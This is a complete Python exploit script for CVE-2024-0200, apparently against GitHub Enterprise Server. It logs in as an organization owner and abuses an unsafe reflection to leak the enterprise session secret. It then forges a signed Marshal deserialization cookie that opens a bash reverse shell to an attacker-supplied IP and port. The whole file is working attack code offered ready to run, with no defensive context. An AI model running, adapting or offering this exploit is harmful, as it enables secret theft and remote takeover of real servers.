import re import hmac import json import base64 import random import string import hashlib import argparse import requests import urllib.parse from bs4 import BeautifulSoup import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class Exploit(): def __init__(self, target, username, password, connect_back_ip, connect_back_port): self.base_url = target.rstrip('/') self.base_api_url = f'{self.base_url}/api/v3' self.username = username self.password = password self.connect_back_ip = connect_back_ip self.connect_back_port = connect_back_port self.web_session = requests.Session() self.api_session = requests.Session() self.api_session.auth = (username, password) self.org_name = '' self.secret = '' # Function to check if the user is an organization owner def check_organization_owner(self): print("Checking if user is an organization owner...") url = f'{self.base_api_url}/user/orgs' response = self.api_session.get(url, verify=False) orgs = response.json() if response.status_code == 200: for org in orgs: role = self.get_user_role(org['login']) if role == 'admin': self.org_name = org['login'] return True return False # Function to get the user's role in an organization def get_user_role(self, org_name): url = f'{self.base_api_url}/orgs/{org_name}/memberships/{self.username}' response = self.api_session.get(url, verify=False) if response.status_code == 200: membership = response.json() return membership['role'] else: return None # Generate a random alphanumeric string of given length. def generate_random_string(self, length): alphanumeric_chars = string.ascii_letters + string.digits return ''.join(random.choice(alphanumeric_chars) for _ in range(length)) # Creates a new repository in an organization. def create_repository(self, repo_name): url = f'{self.base_api_url}/orgs/{self.org_name}/repos' data = { 'name': repo_name } response = self.api_session.post(url, json=data, verify=False) if response.status_code == 201: print(f'Repository "{repo_name}" created successfully in organization "{self.org_name}"!') else: raise Exception(f'Failed to create repository "{repo_name}" in organization "{self.org_name}"') # Checks if any repository exists in the organization. If not, creates one. def make_sure_repo_exists(self): print("Checking if at least one repository exists in the organization...") url = f"{self.base_api_url}/orgs/{self.org_name}/repos" response = self.api_session.get(url, verify=False) if response.status_code == 200: repositories = response.json() if not repositories: print("No repositories found. Creating a new one...") self.create_repository(self.generate_random_string(10)) else: print("Repositories exist in the organization.") else: raise Exception("Failed to fetch repositories.") # Fetch CSRF token from the login page. def get_csrf_token(self): url = f"{self.base_url}/login" response = self.web_session.get(url, verify=False) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'authenticity_token'}).get('value') return csrf_token # Send a POST request to login using the provided credentials and CSRF token. def login(self, csrf_token): url = f"{self.base_url}/session" data = { 'login': self.username, 'password': self.password, 'commit': 'Sign in', 'authenticity_token': csrf_token, } response = self.web_session.post(url, data=data, verify=False) return 'Sign out' in response.text # Login in the Web application def do_login(self): print("Trying to login in the web app...") # Step 1: Get CSRF Token csrf_token = self.get_csrf_token() print("CSRF Token:", csrf_token) # Step 2: Login login_response = self.login(csrf_token) return login_response # Finds the token value "ENTERPRISE_SESSION_SECRET"=>"xxx" in the provided data def find_token_value(self, content): pattern = r'"ENTERPRISE_SESSION_SECRET"=>"([^"]+)"' match = re.search(pattern, content) if match: return match.group(1) else: return None # Using the unsafe reflection, leak ENTERPRISE_SESSION_SECRET via restore_objects method def leak_session_secret(self): if not self.do_login(): raise("Login error, Aborting") print("Login OK") print("Triggering Unsafe Reflection") url = f"{self.base_url}/organizations/{self.org_name}/settings/actions/repository_items" response = self.web_session.get(url, params={"page": 1, "rid_key": "restore_objects"}, verify=False) soup = BeautifulSoup(response.text, 'html.parser') data = soup.find('input', {'name': 'repository_ids[]'}).get('value') self.secret = self.find_token_value(data) print(f"Found ENTERPRISE_SESSION_SECRET: {self.secret}") # Get RCE via Cookies Marshal deserialization def rce(self): code = f"`bash -c 'bash -i >& /dev/tcp/{self.connect_back_ip}/{self.connect_back_port} 0>&1 &'`" print("Sending RCE payload...") marshal_template = ( "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instance" "o:\x1DAqueduct::Worker::Worker\a:\v@childI\"\x026\x0199999999; AAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAA\x06:\x06ET:\f@loggero:\vLogger\x00:\f@method:\x0Fkill_ch" "ild:\t@varI\"\x10@kill_child\x06;\tT:\x10@deprecatoro:\x1FActiveSupport::Deprecation" "\x06:\x0E@silencedT" ) code = code.replace('"','\"') marshal_code = marshal_template.replace("A" * 300, code + ";" + "A" * (300 - len(code) - 1)) marshal_encoded = base64.b64encode(bytes(marshal_code, 'UTF-8')).rstrip() digest = hmac.new(bytes(self.secret, 'UTF-8'), marshal_encoded, hashlib.sha1).hexdigest() marshal_encoded = urllib.parse.quote(marshal_encoded) session_cookie = "%s--%s" % (marshal_encoded, digest) print(session_cookie) cookies = {'_gh_render': session_cookie} requests.get(self.base_url, cookies=cookies, verify=False) print("Done") def run(self): if not self.check_organization_owner(): print(f'You are not an organization owner. Aborting since this is an requirement for the exploit.') return print(f"User is an owner of organization {self.org_name}") self.make_sure_repo_exists() self.leak_session_secret() self.rce() def main(): parser = argparse.ArgumentParser(description='CVE-2024-0200 exploit') parser.add_argument('target', type=str, help='Target base URL') parser.add_argument('username', type=str, help='Username for login') parser.add_argument('password', type=str, help='Password for login') parser.add_argument('connect_back_ip', type=str, help='Connect back IP') parser.add_argument('connect_back_port', type=str, help='Connect back Port') args = parser.parse_args() xpl = Exploit(args.target, args.username, args.password, args.connect_back_ip, args.connect_back_port) xpl.run() if __name__ == '__main__': main()